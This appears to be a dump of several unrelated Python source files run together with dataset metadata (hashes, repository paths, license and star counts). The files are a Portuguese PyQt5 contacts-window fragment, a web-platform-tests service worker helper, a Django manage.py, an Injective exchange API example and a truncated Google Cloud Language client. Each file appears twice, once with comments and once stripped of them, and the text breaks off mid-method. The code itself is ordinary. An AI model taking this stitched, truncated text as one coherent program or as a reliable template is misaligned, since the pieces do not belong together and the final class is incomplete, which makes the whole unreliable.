self.scrollAreaWidgetContents_2.setObjectName("scrollAreaWidgetContents_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents_2)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 1)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.tabela_de_contatos = QtWidgets.QTableView(self.scrollAreaWidgetContents_2)
self.tabela_de_contatos.setStyleSheet("#tabela_de_contatos{\n"
" color: black;\n"
" \n"
" background-color: rgb(255, 255, 224);\n"
"}")
self.tabela_de_contatos.setFrameShape(QtWidgets.QFrame.NoFrame)
self.tabela_de_contatos.setObjectName("tabela_de_contatos")
self.verticalLayout_2.addWidget(self.tabela_de_contatos)
self.scrollArea.setWidget(self.scrollAreaWidgetContents_2)
self.verticalLayout.addWidget(self.scrollArea)
self.barra_de_botoes = QtWidgets.QFrame(self.centralwidget)
self.barra_de_botoes.setMaximumSize(QtCore.QSize(16777215, 60))
self.barra_de_botoes.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.barra_de_botoes.setFrameShadow(QtWidgets.QFrame.Raised)
self.barra_de_botoes.setObjectName("barra_de_botoes")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.barra_de_botoes)
self.horizontalLayout.setContentsMargins(4, 0, 4, 0)
self.horizontalLayout.setSpacing(10)
self.horizontalLayout.setObjectName("horizontalLayout")
self.b_adicionar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_adicionar.setMinimumSize(QtCore.QSize(0, 33))
self.b_adicionar.setStyleSheet("#b_adicionar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_adicionar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_adicionar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_adicionar.setObjectName("b_adicionar")
self.horizontalLayout.addWidget(self.b_adicionar)
self.b_atualizar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_atualizar.setMinimumSize(QtCore.QSize(0, 33))
self.b_atualizar.setStyleSheet("#b_atualizar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_atualizar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_atualizar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_atualizar.setObjectName("b_atualizar")
self.horizontalLayout.addWidget(self.b_atualizar)
self.b_deletar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_deletar.setMinimumSize(QtCore.QSize(0, 33))
self.b_deletar.setStyleSheet("#b_deletar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_deletar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_deletar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_deletar.setObjectName("b_deletar")
self.horizontalLayout.addWidget(self.b_deletar)
self.refresh = QtWidgets.QPushButton(self.barra_de_botoes)
self.refresh.setMinimumSize(QtCore.QSize(0, 40))
self.refresh.setMaximumSize(QtCore.QSize(70, 16777215))
self.refresh.setStyleSheet("#refresh{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" background-image: url(:/imagens/rotacaoE.png);\n"
" background-position:center;\n"
" border-style: solid;\n"
"}\n"
"\n"
"#refresh:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#refresh:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.refresh.setText("")
self.refresh.setObjectName("refresh")
self.horizontalLayout.addWidget(self.refresh)
self.verticalLayout.addWidget(self.barra_de_botoes)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_2.setText(_translate("MainWindow", "UserName"))
self.b_procurar.setText(_translate("MainWindow", "Buscar"))
self.b_sair.setText(_translate("MainWindow", "Sair"))
self.b_adicionar.setText(_translate("MainWindow", "ADICIONAR"))
self.b_atualizar.setText(_translate("MainWindow", "ATUALIZAR"))
self.b_deletar.setText(_translate("MainWindow", "DELETAR"))
| true
| true
|
1c447e118ee71765a18a3343c88e0fc0fd12ee27
| 555
|
py
|
Python
|
service-workers/service-worker/resources/update-missing-import-scripts-main-worker.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
service-workers/service-worker/resources/update-missing-import-scripts-main-worker.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 7,642
|
2018-05-28T09:38:03.000Z
|
2022-03-31T20:55:48.000Z
|
service-workers/service-worker/resources/update-missing-import-scripts-main-worker.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
from wptserve.utils import isomorphic_decode
def main(request, response):
key = request.GET[b'key']
already_requested = request.server.stash.take(key)
header = [(b'Content-Type', b'application/javascript')]
initial_script = u'importScripts("./update-missing-import-scripts-imported-worker.py?key={0}")'.format(isomorphic_decode(key))
updated_script = u'// removed importScripts()'
if already_requested is None:
request.server.stash.put(key, True)
return header, initial_script
return header, updated_script
| 34.6875
| 130
| 0.722523
|
from wptserve.utils import isomorphic_decode
def main(request, response):
key = request.GET[b'key']
already_requested = request.server.stash.take(key)
header = [(b'Content-Type', b'application/javascript')]
initial_script = u'importScripts("./update-missing-import-scripts-imported-worker.py?key={0}")'.format(isomorphic_decode(key))
updated_script = u'// removed importScripts()'
if already_requested is None:
request.server.stash.put(key, True)
return header, initial_script
return header, updated_script
| true
| true
|
1c447e3673bf441602a3991a418258f9af63b818
| 1,055
|
py
|
Python
|
manage.py
|
Zamy97/Algorithms_Explained
|
048022903da4199b3d245997e95c172cfbea508f
|
[
"MIT"
] | 1
|
2020-09-22T14:29:46.000Z
|
2020-09-22T14:29:46.000Z
|
manage.py
|
Zamy97/Algorithms_Explained
|
048022903da4199b3d245997e95c172cfbea508f
|
[
"MIT"
] | null | null | null |
manage.py
|
Zamy97/Algorithms_Explained
|
048022903da4199b3d245997e95c172cfbea508f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.local")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django # noqa
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
# This allows easy placement of apps within the interior
# algorithms_explained directory.
current_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(current_path, "algorithms_explained"))
execute_from_command_line(sys.argv)
| 34.032258
| 77
| 0.664455
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.local")
try:
from django.core.management import execute_from_command_line
except ImportError:
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
current_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(current_path, "algorithms_explained"))
execute_from_command_line(sys.argv)
| true
| true
|
1c447e6400e709ae86806edfead5fe49bd6a8135
| 1,374
|
py
|
Python
|
examples/async/exchange_client/spot_exchange_rpc/5_Orders.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 10
|
2021-09-07T08:03:52.000Z
|
2022-03-08T08:39:30.000Z
|
examples/async/exchange_client/spot_exchange_rpc/5_Orders.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 39
|
2021-08-19T20:09:35.000Z
|
2022-03-22T19:51:59.000Z
|
examples/async/exchange_client/spot_exchange_rpc/5_Orders.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 5
|
2021-11-02T16:23:48.000Z
|
2022-01-20T22:30:05.000Z
|
# Copyright 2021 Injective Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Injective Exchange API client for Python. Example only."""
import asyncio
import logging
from pyinjective.async_client import AsyncClient
from pyinjective.constant import Network
async def main() -> None:
network = Network.testnet()
client = AsyncClient(network, insecure=False)
market_id = "0xa508cb32923323679f29a032c70342c147c17d0145625922b0ef22e955c844c0"
order_side = "sell" # buy or sell
subaccount_id = "0xaf79152ac5df276d9a8e1e2e22822f9713474902000000000000000000000000"
orders = await client.get_spot_orders(
market_id=market_id,
order_side=order_side,
subaccount_id=subaccount_id
)
print(orders)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(main())
| 36.157895
| 88
| 0.762009
|
import asyncio
import logging
from pyinjective.async_client import AsyncClient
from pyinjective.constant import Network
async def main() -> None:
network = Network.testnet()
client = AsyncClient(network, insecure=False)
market_id = "0xa508cb32923323679f29a032c70342c147c17d0145625922b0ef22e955c844c0"
order_side = "sell"
subaccount_id = "0xaf79152ac5df276d9a8e1e2e22822f9713474902000000000000000000000000"
orders = await client.get_spot_orders(
market_id=market_id,
order_side=order_side,
subaccount_id=subaccount_id
)
print(orders)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(main())
| true
| true
|
1c447eb7147743f31a6feffd42b5ffac2e5fe09c
| 24,457
|
py
|
Python
|
language/google/cloud/language_v1/gapic/language_service_client.py
|
nielm/google-cloud-python
|
fd126fdea34206109eb00d675374ff7dc4dcc5ef
|
[
"Apache-2.0"
] | 1
|
2019-01-23T21:54:51.000Z
|
2019-01-23T21:54:51.000Z
|
language/google/cloud/language_v1/gapic/language_service_client.py
|
nielm/google-cloud-python
|
fd126fdea34206109eb00d675374ff7dc4dcc5ef
|
[
"Apache-2.0"
] | 1
|
2018-04-06T19:51:23.000Z
|
2018-04-06T19:51:23.000Z
|
language/google/cloud/language_v1/gapic/language_service_client.py
|
nielm/google-cloud-python
|
fd126fdea34206109eb00d675374ff7dc4dcc5ef
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.cloud.language.v1 LanguageService API."""
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import grpc
from google.cloud.language_v1.gapic import enums
from google.cloud.language_v1.gapic import language_service_client_config
from google.cloud.language_v1.gapic.transports import language_service_grpc_transport
from google.cloud.language_v1.proto import language_service_pb2
from google.cloud.language_v1.proto import language_service_pb2_grpc
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-language").version
class LanguageServiceClient(object):
"""
Provides text analysis operations such as sentiment analysis and entity
recognition.
"""
SERVICE_ADDRESS = "language.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.cloud.language.v1.LanguageService"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
LanguageServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
):
"""Constructor.
Args:
transport (Union[~.LanguageServiceGrpcTransport,
Callable[[~.Credentials, type], ~.LanguageServiceGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = language_service_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=language_service_grpc_transport.LanguageServiceGrpcTransport,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = language_service_grpc_transport.LanguageServiceGrpcTransport(
address=self.SERVICE_ADDRESS, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def analyze_sentiment(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Analyzes the sentiment of the provided text.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> response = client.analyze_sentiment(document)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
encoding_type (~google.cloud.language_v1.types.EncodingType): The encoding type used by the API to calculate sentence offsets.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.AnalyzeSentimentResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "analyze_sentiment" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_sentiment"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_sentiment,
default_retry=self._method_configs["AnalyzeSentiment"].retry,
default_timeout=self._method_configs["AnalyzeSentiment"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeSentimentRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_sentiment"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_entities(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Finds named entities (currently proper names and common nouns) in the text
along with entity types, salience, mentions for each entity, and
other properties.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> response = client.analyze_entities(document)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
encoding_type (~google.cloud.language_v1.types.EncodingType): The encoding type used by the API to calculate offsets.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.AnalyzeEntitiesResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "analyze_entities" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_entities"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_entities,
default_retry=self._method_configs["AnalyzeEntities"].retry,
default_timeout=self._method_configs["AnalyzeEntities"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeEntitiesRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_entities"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_entity_sentiment(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Finds entities, similar to ``AnalyzeEntities`` in the text and analyzes
sentiment associated with each entity and its mentions.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> response = client.analyze_entity_sentiment(document)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
encoding_type (~google.cloud.language_v1.types.EncodingType): The encoding type used by the API to calculate offsets.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.AnalyzeEntitySentimentResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "analyze_entity_sentiment" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_entity_sentiment"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_entity_sentiment,
default_retry=self._method_configs["AnalyzeEntitySentiment"].retry,
default_timeout=self._method_configs["AnalyzeEntitySentiment"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeEntitySentimentRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_entity_sentiment"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_syntax(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Analyzes the syntax of the text and provides sentence boundaries and
tokenization along with part of speech tags, dependency trees, and other
properties.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> response = client.analyze_syntax(document)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
encoding_type (~google.cloud.language_v1.types.EncodingType): The encoding type used by the API to calculate offsets.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.AnalyzeSyntaxResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "analyze_syntax" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_syntax"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_syntax,
default_retry=self._method_configs["AnalyzeSyntax"].retry,
default_timeout=self._method_configs["AnalyzeSyntax"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeSyntaxRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_syntax"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def classify_text(
self,
document,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Classifies a document into categories.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> response = client.classify_text(document)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.ClassifyTextResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "classify_text" not in self._inner_api_calls:
self._inner_api_calls[
"classify_text"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.classify_text,
default_retry=self._method_configs["ClassifyText"].retry,
default_timeout=self._method_configs["ClassifyText"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.ClassifyTextRequest(document=document)
return self._inner_api_calls["classify_text"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def annotate_text(
self,
document,
features,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
A convenience method that provides all the features that analyzeSentiment,
analyzeEntities, and analyzeSyntax provide in one call.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> # TODO: Initialize `features`:
>>> features = {}
>>>
>>> response = client.annotate_text(document, features)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
features (Union[dict, ~google.cloud.language_v1.types.Features]): The enabled features.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Features`
encoding_type (~google.cloud.language_v1.types.EncodingType): The encoding type used by the API to calculate offsets.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.AnnotateTextResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "annotate_text" not in self._inner_api_calls:
self._inner_api_calls[
"annotate_text"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.annotate_text,
default_retry=self._method_configs["AnnotateText"].retry,
default_timeout=self._method_configs["AnnotateText"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnnotateTextRequest(
document=document, features=features, encoding_type=encoding_type
)
return self._inner_api_calls["annotate_text"](
request, retry=retry, timeout=timeout, metadata=metadata
)
| 43.517794
| 138
| 0.623339
|
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import grpc
from google.cloud.language_v1.gapic import enums
from google.cloud.language_v1.gapic import language_service_client_config
from google.cloud.language_v1.gapic.transports import language_service_grpc_transport
from google.cloud.language_v1.proto import language_service_pb2
from google.cloud.language_v1.proto import language_service_pb2_grpc
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-language").version
class LanguageServiceClient(object):
SERVICE_ADDRESS = "language.googleapis.com:443"
_INTERFACE_NAME = "google.cloud.language.v1.LanguageService"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
):
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = language_service_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=language_service_grpc_transport.LanguageServiceGrpcTransport,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = language_service_grpc_transport.LanguageServiceGrpcTransport(
address=self.SERVICE_ADDRESS, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
self._inner_api_calls = {}
def analyze_sentiment(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "analyze_sentiment" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_sentiment"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_sentiment,
default_retry=self._method_configs["AnalyzeSentiment"].retry,
default_timeout=self._method_configs["AnalyzeSentiment"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeSentimentRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_sentiment"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_entities(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "analyze_entities" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_entities"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_entities,
default_retry=self._method_configs["AnalyzeEntities"].retry,
default_timeout=self._method_configs["AnalyzeEntities"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeEntitiesRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_entities"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_entity_sentiment(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "analyze_entity_sentiment" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_entity_sentiment"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_entity_sentiment,
